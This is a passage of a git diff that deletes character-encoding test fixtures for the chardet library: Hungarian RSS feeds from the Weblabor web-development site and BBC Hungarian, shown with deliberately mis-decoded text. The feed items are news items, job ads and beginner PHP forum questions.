Kֳ¶nnyen elֵ‘fordulhat az is, hogy a PHP 5-re frissֳ­tֳ©st tervezֵ‘k kivֳ¡rjֳ¡k a modern karakterkֳ³dolֳ¡st ֳ©s dֳ¡tum kezelֳ©st is biztosֳ­tֳ³ PHP 6-os ֳ©rkezֳ©sֳ©t. Az is ֳ©rdekes kֳ©rdֳ©s, hogy mikֳ©nt tudjֳ¡k majd biztosֳ­tani a hoszting szolgֳ¡ltatֳ³k mindhֳ¡rom verziֳ³t felhasznֳ¡lֳ³ik szֳ¡mֳ¡ra. - PHP - Wed, 04 Jan 2006 11:15:54 +0100 - - - Hijax: tervezֳ©s AJAX-ra gondolva - http://weblabor.hu/hirek/20060104/hijax - Az AJAX immֳ¡r mindennapos varֳ¡zsszֳ³, a legֳ÷jabb technolֳ³giֳ¡k zֳ¡szlֳ³shajֳ³ja. Jeremy Keith azonban ֳ÷gy gondolja, hogy nem egy ֳ÷j technolֳ³giakֳ©nt kellene rֳ¡ tekintenֳ¼nk, hanem csupֳ¡n egy kiegֳ©szֳ­tֳ©sre, amely valamivel tֳ¶bb lehetֵ‘sֳ©get ad a webes alkalmazֳ¡sok kialakֳ­tֳ¡sֳ¡ban. Vֳ©lemֳ©nye szerint az a megkֳ¶zelֳ­tֳ©s eleve elhibֳ¡zott, hogy alkalmazֳ¡sokra gondolva az AJAX nֳ©lkֳ¼li mֵ±kֳ¶dֳ©st teljesen el is felejtjֳ¼k, a dokumentum alapֳ÷ web eszmֳ©jֳ©t mintegy a szֵ‘nyeg alֳ¡ sֳ¶pֳ¶rve. Nem mehetֳ¼nk el amellett, hogy a web mֳ©g mindig dokumentumokbֳ³l ֳ¡ll, mֳ©g ha azok nֳ©ha alkalmazֳ¡snak tֵ±nnek is. - Felֳ¼let - Wed, 04 Jan 2006 09:21:33 +0100 - - - ֳj ֳ©v a NetVibes-nֳ¡l - http://weblabor.hu/hirek/20060103/ujevnetvibes - Novemberi beszֳ¡molֳ³nkat kֳ¶vetֵ‘en csֳ¶nd ֳ¶vezte a NetVibes hֳ¡zatֳ¡jֳ¡t, azonban az utֳ³bbi idֵ‘kben ismֳ©t felpezsdֳ¼lt az ֳ©let a projekt kֳ¶rֳ¼l. Ahogy mֳ¡r korֳ¡bban blogmarkban jeleztֳ¼k, a Todo modul segֳ­tֳ©sֳ©gֳ©vel teendֵ‘inket tarthatjuk nyilvֳ¡n, mֳ­g a Yahoo mail komponenssel a GMail-rivֳ¡lis web 2.0 levezֵ‘szoftvert hasznֳ¡lֳ³knak jֳ¡rt a kedvֳ¼kben a fejlesztֵ‘gֳ¡rda. - Felֳ¼let - Tue, 03 Jan 2006 18:37:22 +0100 - - - Bevezetֳ©s a keresֵ‘optimalizֳ¡lֳ¡sba - http://weblabor.hu/hirek/20060103/seointro - A napokban bukkantam rֳ¡ a seomoz Beginner&#039;s Guide to SEO cֳ­mֵ± dokumentumֳ¡ra, ami egy kivֳ©telesen ֳ¶sszeszedett ֳ©s rֳ©szletes bevezetֵ‘ a keresֵ‘optimalizֳ¡lֳ¡sba. Vֳ©lemֳ©nyem szerint nagyon jֳ³ megkֳ¶zelֳ­tֳ©st ad a tֳ©mֳ¡hoz, a szokvֳ¡nyos keresֵ‘ kifejezֳ©sekre optimalizֳ¡lֳ¡s mellett jֳ³l kiemelve a felhasznֳ¡lֳ³kra optimalizֳ¡lֳ¡s fontossֳ¡gֳ¡t, az ֳ©rtֳ©kes tartalom szerepֳ©t. Kֳ¼lֳ¶nֳ¶sen ֳ©rdekes a webhely nֳ©pszerֵ±sֳ­tֳ©sre vonatkozֳ³ tippek listֳ¡ja. - Keresֵ‘ - Tue, 03 Jan 2006 17:07:10 +0100 - - - Kֳ¶zֳ¶s rajztֳ¡bla - http://weblabor.hu/hirek/20060102/kozosrajztabla - Goba kֳ¼ldte be nemrֳ©giben a linket, mely egy ֳ©rdekes alkalmazֳ¡sֳ¡t mutatta be a kֳ¶zֳ¶s alkotֳ¡snak, egy weblapba ֳ¡gyazott SVG rֳ©szlet segֳ­tsֳ©gֳ©vel. ֳ‰rdekes kֳ­sֳ©rlet, lֳ¡ttunk mֳ¡r hasonlֳ³t, mֳ©gsem lֳ¡ttam mֳ©g azt, ami itt bekֳ¶vetkezett: elֵ‘tֳ¶rt mindenkibֵ‘l a gyermeki vֳ©na, ֳ©s hihetetlen alkotֳ¡sok szֳ¼lettek percek alatt... - Web - Tue, 03 Jan 2006 11:00:28 +0100 - - - Klikkelֳ©s kֳ¶vetֳ©s AJAX segֳ­tsֳ©gֳ©vel - http://weblabor.hu/hirek/20060102/ajaxlinktracker - Sokak szֳ¡mֳ¡ra okoz gondot, hogy a webhelyhez kapcsolֳ³dֳ³ statisztikֳ¡t nem tudjֳ¡k hasznֳ¡lhatֳ³ stratֳ©giֳ¡vֳ¡ formֳ¡lni a tartalom javֳ­tֳ¡sֳ¡t illetֵ‘en. A link kattintֳ¡sok rֳ¶gzֳ­tֳ©sֳ©vel ugyanis azok weblaphoz kapcsolֳ³dֳ³ jelentֵ‘sֳ©ge elvֳ©sz. Nem tudhatjuk pontosan, hogy a megfelelֵ‘ prezentֳ¡ciֳ³, a link tֳ¶bb helyen tֳ¶rtֳ©nֵ‘ ismֳ©tlֳ©se, esetleg egy jֳ³l sikerֳ¼lt cikk vezetett ahhoz, hogy tֳ¶bben klikkeltek egy adott linkre. Glenn Jones egy ֳ¶tletes megoldֳ¡st adott erre. - Felֳ¼let - Mon, 02 Jan 2006 09:16:23 +0100 - - - Firefox memֳ³ria felszabadֳ­tֳ¡sa ablak minimalizֳ¡lֳ¡skor - http://weblabor.hu/hirek/20060102/firefoxmemmin - A Firefoxnak nagy tudֳ¡sa ֳ©s sok funkciֳ³ja mellett van egy elֳ©g rossz tulajdonsֳ¡ga is: viszonylag sok memֳ³riֳ¡t kֳ©pes lefoglalni magֳ¡nak. Manapsֳ¡g mֳ¡r a bֳ¶ngֳ©szֵ‘ folyamatos hasznֳ¡latban van, ֳ­gy gondolom hozzֳ¡m hasonlֳ³an mֳ¡sok se zֳ¡rjֳ¡k be a programot, amֳ­g mֳ¡s alkalmazֳ¡ssal dolgoznak, legfeljebb minimalizֳ¡ljֳ¡k az ablakֳ¡t. Mֳ¡s programokkal ellentֳ©tben azonban a Firefox ilyenkor az ֳ¡ltala foglalt fizikai memֳ³riֳ¡t nem szabadֳ­tja fel. - Bֳ¶ngֳ©szֵ‘ - Mon, 02 Jan 2006 14:46:59 +0100 - - - Canvas tֳ¡mogatֳ¡s Internet Explorerben? - http://weblabor.hu/hirek/20060101/canvasie - A &lt;canvas&gt; sokak szerint az egyik legfontosabb bֳ¶ngֳ©szֵ‘ oldali innovֳ¡ciֳ³, ami az utֳ³bbi idֵ‘ben szֳ¼letett. Lֳ¡ttuk, hogy a kiszֳ¡mֳ­tott visszatֳ¼krֳ¶zֵ‘dֳ©stֵ‘l a rajzolֳ³programon keresztֳ¼l a lֳ¶vֳ¶ldֳ¶zֵ‘s jֳ¡tֳ©kig sokminden megvalֳ³sֳ­thatֳ³ segֳ­tsֳ©gֳ©vel. Sajnos azonban a Safari ֳ©s a Firefox 1.5 kivֳ©telֳ©vel mֳ¡s bֳ¶ngֳ©szֵ‘ben mֳ©g nem ֳ©rhetֵ‘ el a tֳ¡mogatֳ¡sa, a leendֵ‘ Opera 9-es kiadֳ¡sban vֳ¡rhatֳ³ a megjelenֳ©se. De mit tehetֳ¼nk, ha Internet Explorerben szeretnֳ©nk a &lt;canvas&gt; elemet hasznֳ¡lni? - Felֳ¼let - Sun, 01 Jan 2006 22:15:58 +0100 - - - Weblabor karcsֳ÷sֳ­tֳ¡s az ֳ÷j ֳ©vre - http://weblabor.hu/hirek/20051231/karcsusitas - Ilyenkor szilveszter idejֳ©n az emberek hajlamosak mindenfֳ©le ֳ­gֳ©retet tenni arra vonatkozֳ³an, hogy mit tesznek majd az ֳ÷j ֳ©vben. ֳllֳ­tֳ³lag a leggyakoribb ilyen ֳ­gֳ©ret a fogyֳ¡srֳ³l szֳ³l. Nos a Weblaboron egy kicsit elֵ‘rehoztuk az ֳ­gֳ©ret megvalֳ³sֳ­tֳ¡sֳ¡t, nehogy az ֳ÷jֳ©vi fogadalmak sorsֳ¡ra jusson az elkֳ©pzelֳ©s. Akik napi szinten hasznֳ¡ljֳ¡k a Weblabort, talֳ¡n ֳ©szrevettek szֳ¡mos vֳ¡ltozֳ¡st az utֳ³bbi hetekben. - Weblabor - Sat, 31 Dec 2005 16:39:36 +0100 - - - Megjelent a WordPress 2.0 - http://weblabor.hu/hirek/20051231/wordpress2 - A WordPress blogmotor ֳ©letֳ©nek ֳ÷jabb mֳ©rfֳ¶ldkֳ¶vֳ©hez ֳ©rkezett. Noha hivatalos bejelentֳ©s mֳ©g nincs, ahogy mֳ¡r biztos sokan hallottֳ¡tok, megjelent a 2.0-s verziֳ³. A WordPress az elmֳ÷lt idֵ‘kben igen nagy nֳ©pszerֵ±sֳ©gre tett szert, nֳ©zzֳ¼nk csak szֳ©t a hֳ¡ztֳ¡ji keresֵ‘ben. Mind a csupֳ¡n blogolni vֳ¡gyֳ³k, mind a fejlesztֵ‘k szֳ¡mֳ¡ra kedves eszkֳ¶zrֵ‘l van szֳ³. Az 1.5-ֳ¶s szֳ©ria megjelentֳ©vel is mֳ¡r az ֳ©lvonalba kerֳ¼lt az alkalmazֳ¡s, a 2-es kiadֳ¡s pedig rendesen feladja a leckֳ©t a konkurenciֳ¡nak. No de, lֳ¡ssuk a medvֳ©t! - Tartalomkezelֵ‘ - Sat, 31 Dec 2005 21:22:28 +0100 - - - Hֳ­rforrֳ¡s ikonok, "szabvֳ¡nyosֳ­tva" - http://weblabor.hu/hirek/20051230/feedikonszabvany - Minden a narancssֳ¡rga RSS ikonnal kezdֵ‘dֳ¶tt - de szerencsֳ©re nem ezzel lett vֳ©ge. Sok oldalon lelhetֵ‘ fel ma mֳ¡r (ֳ­gy nֳ¡lunk is) az RSS hֳ­rforrֳ¡st hirdetֵ‘ narancssֳ¡rga &quot;RSS&quot; feliratֳ÷ kis ikonka, mely jelzi a lֳ¡togatֳ³k szֳ¡mֳ¡ra, hogy az adott oldal ebben a formֳ¡tumban is elֳ©rhetֵ‘vֳ© tette hֳ­reit. Igen ֳ¡m, de egyrֳ©szt ezekre nincsen kialakult ikon (bֳ¡r azֳ©rt hasonlֳ­tani szoktak egymֳ¡sra ezek az ikonok), mֳ¡srֳ©szt pedig nem csak ebben a formֳ¡tumban lֳ©tezik hֳ­rforrֳ¡s. De itt a megoldֳ¡s! - Szabvֳ¡ny - Fri, 30 Dec 2005 22:16:52 +0100 - - - Firefox 1.5 ֳ©s Weblabor a Fix.tv mֵ±sorֳ¡n - http://weblabor.hu/hirek/20051225/mediasztar - Sajnos a Weblaboron nem volt idֵ‘(m) reklֳ¡mozni, de az utֳ³bbi hetekben a Fix.tv LinuxPortֳ¡l mֵ±sorֳ¡nak tֳ¶bb adֳ¡sֳ¡ban is szerepeltem. Akik nem kaptֳ¡k el az adֳ¡sokat ֳ©lֵ‘ben vagy ismֳ©tlֳ©sben, immֳ¡ron letֳ¶lthetֵ‘ ֳ¡llapotban is elֳ©rhetnek kֳ©t mֵ±sort: az egyikben a Firefox 1.5-ֳ¶s verziֳ³jֳ¡rֳ³l, a mֳ¡sikban pedig a Weblaborrֳ³l tֳ¡rsalogtunk a mֵ±sorvezetֵ‘vel. - Margֳ³ - Mon, 26 Dec 2005 13:02:51 +0100 - - - Keresztplatformos turbֳ³ textarea a Jֳ©zuskֳ¡tֳ³l - http://weblabor.hu/hirek/20051224/crossbrowserturbotextarea - Szeretnֳ©k a karֳ¡csonykor is minket olvasֳ³knak egy kis meglepetֳ©ssel szolgֳ¡lni, aminek nֳ©mileg ֳ©rdekes tֳ¶rtֳ©nete van. Egy levelezֵ‘ listֳ¡s szֳ¡llal indult, melynek keretֳ©n belֳ¼l szerettem volna egy minֳ©l inkֳ¡bb bֳ¶ngֳ©szֵ‘ fֳ¼ggetlen mֳ³dszert talֳ¡lni arra, hogy egy textarea belsֵ‘ terֳ¼letֳ©n le tudjam kֳ©rdezni illetve be tudjam ֳ¡llֳ­tani a kurzor pozֳ­ciֳ³jֳ¡t, valamint bֵ‘vֳ­teni tudjam annak szerkesztֵ‘ funkciֳ³it. Sajnos ezekben a napokban idֵ‘ hiֳ¡nyֳ¡ban esֳ©lyem sem volt, hogy utֳ¡na jֳ¡rjak a tֳ©mֳ¡nak. De tegnap jֳ¶tt a vֳ¡ratlan fordulat. - Web - Sun, 25 Dec 2005 23:47:10 +0100 - - - Bֳ©kֳ©s karֳ¡csonyt kֳ­vֳ¡nunk! - http://weblabor.hu/hirek/20051224/karacsony - A szeretet ֳ¼nnepe idֳ©n is lehetֵ‘sֳ©get ad arra, hogy egy kicsit visszahֳ÷zֳ³djunk a vilֳ¡gtֳ³l, a napi munka helyett csalֳ¡dunkkal, szeretteinkkel tֳ¶ltsֳ¼k az idֵ‘t.<br /> -<br /> -A Weblabor szerkesztֵ‘sֳ©ge ֳ©s az NJSZT WFSZ nevֳ©ben ezֳ÷ton szeretnֳ©nk ֳ¡tadni jֳ³kֳ­vֳ¡nsֳ¡gainkat. Remֳ©ljֳ¼k kֳ¶zֳ¶ssֳ©gֳ¼nk aktֳ­v tagjainak ֳ©s olvasֳ³inknak is megadatik az ֳ¼nnepben valֳ³ elmֳ©lyֳ¼lֳ©s lehetֵ‘sֳ©ge. - Margֳ³ - Sat, 24 Dec 2005 16:46:20 +0100 - - - MySQL kompatibilitֳ¡si rֳ©teg kֳ©szֳ¼l PostreSQL-hez - http://weblabor.hu/hirek/20051218/mysql2pgsql - Sok nyֳ­lt forrֳ¡sֳ÷ program csak MySQL adatbֳ¡ziskezelֵ‘vel mֵ±kֳ¶dik jֳ³l, illetve mֳ©g ha az alap programot sikeresen be is lehet ֳ¼zemelni PostgreSQL hasznֳ¡latֳ¡val, a gondok rֳ¶gtֳ¶n feltֵ±nnek, amint kiegֳ©szֳ­tֵ‘ket szeretnֳ©nk telepֳ­teni. Christopher Kings-Lynne ֳ÷gy gondolta, hogy ezen vֳ¡ltoztatni kellene, ֳ©s ha az ֳ¶sszes nyֳ­lt forrֳ¡sֳ÷ rendszer nem is javֳ­thatֳ³ ki egyszerre, arra lehet tֳ¶rekedni, hogy a PostgreSQL is kֳ©pes legyen a MySQL felֳ¼letֳ©t biztosֳ­tani a kapcsolֳ³dֳ³ programok szֳ¡mֳ¡ra. - Adatbֳ¡zis - Mon, 19 Dec 2005 00:12:29 +0100 - - - diff --git a/chardet/tests/utf-8/weblabor.hu.xml b/chardet/tests/utf-8/weblabor.hu.xml deleted file mode 100644 index 7c7700a..0000000 --- a/chardet/tests/utf-8/weblabor.hu.xml +++ /dev/null @@ -1,172 +0,0 @@ - - -]> - - - Weblabor - a fejlesztֵ‘i forrֳ¡s - http://weblabor.hu - - hu - - Webfejlesztֵ‘t keresֳ¼nk - http://weblabor.hu/forumok/temak/11167 - Az Antikkֳ¶nyv.hu Kft. webfejlesztֵ‘t keres:<br /> -<br /> -Feladat:A cֳ©g sajֳ¡t ֳ©s ֳ¼gyfelei rֳ©szֳ©re webes alkalmazֳ¡sok fejlesztֳ©se, technikai tֳ¡mogatֳ¡s nyֳ÷jtֳ¡sa.<br /> -<br /> -Elvֳ¡rֳ¡sok:<br /> - * tapasztalattal rendelkezֵ‘ webes megoldֳ¡s fejlesztֵ‘<br /> - * HTML, Javascript, PHP, MySQL, Dreamweaver, Flash, Photoshop ismeretek<br /> -<br /> -Elֵ‘ny: munkabֳ­rֳ¡s, ֳ¼gyfֳ©lorientֳ¡lt magatartֳ¡s, csapatmunka, jֳ³ kommunikֳ¡ciֳ³s kֳ©szsֳ©g<br /> -<br /> -Elֵ‘nyt jelent:Delphi ismeretek<br /> -<br /> -Amit kֳ­nֳ¡lunk:Sok munka, kihֳ­vֳ¡s, dinamikus ֳ©s fiatalos kֳ¶rnyezet<br /> -<br /> -<br /> -Tovֳ¡bbi informֳ¡ciֳ³ֳ©rt keress minket az alֳ¡bbi elֳ©rhetֵ‘sֳ©geken:<br /> -Kovֳ¡cs Adrienn<br /> -Tel.: 362-1286<br /> -Fax: 362-5355<br /> -<br /> -Jelentkezֳ©shez kֳ¼ldd el ֳ¶nֳ©letrajzodat az info##kukac##antikkonyv.hu cֳ­mre!<br /> -<br /> -Vֳ¡rjuk jelentkezֳ©sedet! - Munka / ֳllֳ¡s - Wed, 04 Jan 2006 17:19:44 +0100 - - - Hֳ¡nyadik hֳ©ten van egy dֳ¡tum (PHP-ben)? - http://weblabor.hu/forumok/temak/11166 - Sziasztok,<br /> -<br /> -PHP-ban hogyan lehet megkapni, hogy egy adott dֳ¡tum a hֳ³nap hֳ¡nyadik hetֳ©re esik? Van erre valamilyen egyszerֵ± mֳ³dszer? Sֳ÷gֳ³ban nem talֳ¡ltam semmit erre.<br /> -<br /> -Kֳ¶szi elֵ‘re is!! - PHP - Wed, 04 Jan 2006 17:41:40 +0100 - - - Surface level tips for good API writing - http://weblabor.hu/linkek/11133 - Hogyan ֳ­rjunk API-t - Blogmarkok - Wed, 04 Jan 2006 16:19:17 +0100 - - - Basic webstandards Workshop - http://weblabor.hu/linkek/11117 - A Max Design prezentֳ¡ciֳ³ja a szabvֳ¡nyok okos hasznֳ¡latֳ¡rֳ³l - Blogmarkok - Wed, 04 Jan 2006 15:17:28 +0100 - - - textarea nem kֳ¼ld tֳ¶bb mint 22 sort - http://weblabor.hu/forumok/temak/11165 - Sziasztok!<br /> -<br /> -Van egy visszajelzֳ©si ֳ¼rlapom de a textarea csak k.b 2000 karaktert kֳ¼ld el tֳ¶bbet nem hajlandֳ³. Lehet hogy a www.uw.hu szereverֳ©n korlֳ¡tozva van a szֳ¶vegmenyisֳ©g?<br /> -<br /> -A leveֳ©lkֳ¼ldֳ©s egy mailer.php es egy index.html bֵ‘l ֳ¡ll.<br /> - Mi lehet az oka? - Levֳ©lkֳ¼ldֳ©s ֳ©s fogadֳ¡s PHP-ben - Wed, 04 Jan 2006 15:14:13 +0100 - - - Kֳ©p mֳ©retarֳ¡nyos ֳ¡tmֳ©retezֳ©se PHP-vel - http://weblabor.hu/forumok/temak/11164 - Sziasztok! <br /> -nekem olyan kֳ©rdֳ©sem lenne, hogy hogyan lehet php-vel kֳ©p mֳ©retֳ©t mֳ©retarֳ¡nyosan csֳ¶kkenteni? lehet-e ilyet? ֳ©s ha igen, hogyan?<br /> -elֵ‘re is thx. - PHP - Wed, 04 Jan 2006 14:43:22 +0100 - - - The Anatomy of Web Fonts - http://weblabor.hu/linkek/11151 - Typogrֳ¡fiai ֳ©s szֳ­nkeverֳ©si alapok. - Blogmarkok - Wed, 04 Jan 2006 14:38:56 +0100 - - - Vֳ¡ltozֳ³k ֳ©rtֳ©kֳ©nek ֳ¶sszeadֳ¡sa for ciklusban - http://weblabor.hu/forumok/temak/11163 - Sziasztok!<br /> -<br /> -A kֳ¶vetkezֵ‘ problֳ©mֳ¡ba futottam bele:<br /> -<br /> -Van mondjuk hֳ¡rom vֳ¡ltozֳ³m, ami egֳ©sz szֳ¡mot tartalmaz, ha ezeket szeretnֳ©m ֳ¶sszeadni, ami alaphelyzetben nem is jelent gondot:&lt;?php$x1=1;$x2=2;$x3=3;$x_full=$x1+$x2+$x3;ֳ©s akkor a $x_full ֳ©rtֳ©ke 6 lesz. <br /> -<br /> -Igen ֳ¡m, de az x-ek szֳ¡ma vֳ¡ltozֳ³ (ֵ±rlapbֳ³l ֳ©rkeznek, lehet hֳ¡romnֳ¡l tֳ¶bb is, kevesebb is), ֳ­gy arra gondoltam, hogy megoldom for ciklussal:&lt;?php$x1=1;$x2=2;$x3=3;//x-ek szֳ¡ma:$x_num=3;for($i=1; $i&lt;=$x_num; $i++) { $x="x".$i; $x_full.=+$$x; }Viszont ֳ­gy nem ֳ¶sszeadja, hanem ֳ¶sszefֵ±zi ֵ‘ket, tehֳ¡t $x_full ֳ©rtֳ©ke 123. Prֳ³bֳ¡lkoztam azzal is, hogy a $$x ֳ©rtֳ©kֳ©t ֳ¡talakֳ­tom szֳ¡mmֳ¡, hֳ¡tha ez a gond, de ez sem segֳ­tett. <br /> -<br /> -Elֵ‘re is kֳ¶szi a tippeket, hogy mit ronthattam el. - PHP - Wed, 04 Jan 2006 14:44:29 +0100 - - - HTML kֳ³d fֳ¡jl letֳ¶ltֳ©shez fa struktֳ÷rֳ¡ban? - http://weblabor.hu/forumok/temak/11162 - sziasztok.<br /> -<br /> -tudnatok irni egy szintaxist ami lehetove teszi a html en keresztul a tarhelyrol valo file letoltest? mondjuk ugy hogy megjelennek a filenevek fa-strukturaban?<br /> -<br /> -vagy tudtok tippet adni hol keresgeljek?<br /> -<br /> -koszi<br /> -<br /> -Balazs - [X]HTML / AJAX / Flash - Wed, 04 Jan 2006 14:14:33 +0100 - - - Cool URIs don't change - http://weblabor.hu/linkek/11156 - Az aggregֳ¡torokat megzavarhatja a link vֳ¡ltozֳ¡sa - Blogmarkok - Wed, 04 Jan 2006 13:36:17 +0100 - - - Nem kerֳ¼l be a tartomֳ¡nyok tֳ¡blֳ¡mba az adat (PHP, MySQL) - http://weblabor.hu/forumok/temak/11161 - hali lenne egy ilyen php scriptem. az a baj hogy nem ֳ­rja be az adatokat az adatbֳ¡zisba. A kapcsolat az lֳ©trejֳ¶n de nem ֳ­rja be valamiֳ©rt az adatokat valaki segֳ­theten !&lt;?php$felhasznalo="******";$jelszo="******";$adatbazis="adatbazis1";$kapcsolat=mysql_connect("localhost","$felhasznalo","$jelszo");mysql_select_db('adatbazis1');$query = 'SELECT * FROM tartomanyok';$result = mysql_query($query) or die('Query failed: ' . mysql_error());$parancs="insert into tartomanyok (tartomany,nem,email)values ('123xyz.com','F','dfc##kukac##dfg.hu')";mysql_close( $kapcsolat )?&gt; - PHP - Wed, 04 Jan 2006 14:00:49 +0100 - - - text input mezֵ‘ben ֳ¶sszeg tagolt megjelenֳ­tֳ©se - http://weblabor.hu/forumok/temak/11159 - Sziasztok!<br /> -<br /> -Kedvenc megrendelֵ‘m elֵ‘ֳ¡llt egy olyan kֳ©rֳ©ssel, hogy egy input mezֵ‘ben, ahova egy Ft ֳ¶sszeget kell beֳ­rni, mֳ¡r beֳ­rֳ¡s kֳ¶zben tagolva jelenjen meg, tehֳ¡t pl. ֳ­gy: 1.584.744, mondvֳ¡n, hogy ֳ¡ttekinthetֵ‘bb az ֵ±rlapot kitֳ¶ltֵ‘ szֳ¡mֳ¡ra. Lehetsֳ©ges ez egyֳ¡ltalֳ¡n? Rֳ¡adֳ¡sul, hogy csavarjak mֳ©g egyet rajta, jֳ³ lenne ha az ֵ±rlap elkֳ¼ldֳ©sekor ez ennek ellenֳ©re tagolֳ¡s nֳ©lkֳ¼l menne tovֳ¡bb, mert szֳ¡mkֳ©nt tֳ¡rolnֳ¡m le az adatbֳ¡zisban (mֵ±veleteket kell vele kֳ©sֵ‘bb vֳ©geznem), bֳ¡r ezt utֳ³bbit mֳ©g lehet, hogy meg tudom oldani php-vel, ha egyszerֵ±bb megoldֳ¡s nincs.<br /> -<br /> -Elֵ‘re is kֳ¶szi a tippeket, ha van rֳ¡ megoldֳ¡s, vagy a megrendelֵ‘m felֳ© tovֳ¡bbֳ­thatֳ³ megerֵ‘sֳ­tֳ©st, ha nincs. - [X]HTML / AJAX / Flash - Wed, 04 Jan 2006 12:47:08 +0100 - - - Graphic design plays a minor role on the Web - http://weblabor.hu/linkek/11110 - Mֳ©g mindig sokan nem ֳ©rtik meg, hogy a weblapok nem tv hirdetֳ©sek - Blogmarkok - Wed, 04 Jan 2006 14:23:13 +0100 - - - The Web 2.0 Quiz - http://weblabor.hu/linkek/11143 - Szerinted ismered a Web 2.0-t? - Blogmarkok - Wed, 04 Jan 2006 11:31:01 +0100 - - - Hֳ¡rom aktֳ­v PHP verziֳ³ lehet hasznֳ¡latban 2006-ban - http://weblabor.hu/hirek/20060104/haromphpverzio - Anonim bekֳ¼ldֵ‘nk hֳ­vta fel a figyelmֳ¼nket az Internetnews PHP: Three Versions, One Promise cֳ­mֵ± cikkֳ©re, mely felveti a kֳ©rdֳ©st: problֳ©mֳ¡t jelent-e majd 2006-ban a megjelentetni tervezett PHP 6 illetve a mֳ©g el sem terjedt PHP 5 ֳ©s a szֳ©les kֳ¶rben hasznֳ¡lt PHP 4 egyֳ¼ttֳ©lֳ©se. Kֳ¶nnyen elֵ‘fordulhat az is, hogy a PHP 5-re frissֳ­tֳ©st tervezֵ‘k kivֳ¡rjֳ¡k a modern karakterkֳ³dolֳ¡st ֳ©s dֳ¡tum kezelֳ©st is biztosֳ­tֳ³ PHP 6-os ֳ©rkezֳ©sֳ©t. Az is ֳ©rdekes kֳ©rdֳ©s, hogy mikֳ©nt tudjֳ¡k majd biztosֳ­tani a hoszting szolgֳ¡ltatֳ³k mindhֳ¡rom verziֳ³t felhasznֳ¡lֳ³ik szֳ¡mֳ¡ra. - PHP - Wed, 04 Jan 2006 11:15:54 +0100 - - - diff --git a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.forum.xml b/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.forum.xml deleted file mode 100644 index 1e516ff..0000000 --- a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.forum.xml +++ /dev/null @@ -1,330 +0,0 @@ - - - - - BBCHungarian.com | Fףrum | Hungarian Forum index - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/forum/index.shtml - Jogvיdelem BBC 2004 - hu - 2005-05-18T14:57:42+00:00 - Jogvיdelem BBC 2004 : http://www.bbc.co.uk/hungarian/institutional/rss.shtml#copyright - BBCHungarian.com - hourly - 1 - 2005-05-18T14:57:42+00:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - http://www.bbc.co.uk/hungarian/images/furniture/syndication/bbchungarian_180x80.gif - - - Mirץl szeretne beszיlni? - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/forum/story/2004/07/040728_forumgeneral.shtml - A BBC Magyar Adבsa תj fףrum oldallal ad lehetץsיget a rבdiףhallgatףknak יs internetezץknek, hogy elmondhassבk vיlemיnyket a legklצnbצzץbb tיmבkrףl - 2004-07-28T13:39:05+0000 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Forum - - - Az EU polgבr יs az uniףs intיzmיnyek - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/forum/story/2004/11/041102_eucitizen.shtml - Vajon mennyi beleszףlבsa van az Eurףpai Uniף polgבrainak a Uniף intיzmיnyeinek mkצdיsיbe? - 2004-11-02T11:18:58+0000 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Forum - - - Reformra szorul-e az adףrendszer? - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/forum/story/2004/07/040728_taxreform.shtml - Hogyan kםvבnja a kormבny יs az ellenzיk teljesםteni a eurףhoz valף csatlakozבs pיnzgyi feltיteleit? - 2004-08-12T17:31:08+0000 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Forum - - - "Nem szervezett akciף az zbegisztבni felkelיs" - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050517_uzbegistan.shtml - A BBC elemzץje szerint nem iszlבm felkelיsrץl, hanem politikai, gazdasבgi tiltakozבsrףl van szף - 2005-05-17T04:09:49+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Barroso aggףdik a kםnai textilbehozatal miatt - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_chinaeuminster.shtml - A kםnai kereskedelmi miniszter, Po Hszilai tisztessיgtelennek nevezte az Egyeslt ֱllamok יs az Eurףpai Uniף בltal a kםnai textilexportra tervezett korlבtozבsokat. - - 2005-05-18T13:32:06+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - zemanyagvבlsבg Ukrajnבban - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_fuelproblemsukraine.shtml - Rendkםvli jogszabבlyt fogadott el a parlament, hogy megkםsיreljיk csצkkenteni az zemanyaghiבnyt - 2005-05-18T13:07:15+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Galloway: lincselni kיszlץ csץcselיk - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_galloway.shtml - Lincselni kיszlץ csץcselיknek nevezte az amerikai szenבtusi bizottsבgot a korrupciףval vבdolt brit kיpviselץ - 2005-05-18T06:43:01+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Alultבplבlt iraki gyerekek - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_iraqkidsnofood.shtml - Az ENSZ Fejlesztיsi Programjבnak felmיrיse szerint az iraki gyerekek egynegyede alultבplבlt - 2005-05-18T12:23:31+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Fיl יv bצrtצn az Abu Ghraib-i katonanץnek - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_iraqprison.shtml - Hat hףnap bצrtצnbntetיsre םtיltek egy katonanץt, aki rabokat bבntalmazott az iraki Abu Ghraib bצrtצnben - 2005-05-18T06:36:53+00:00 - text/plain - hu - BBCHungarian.com - 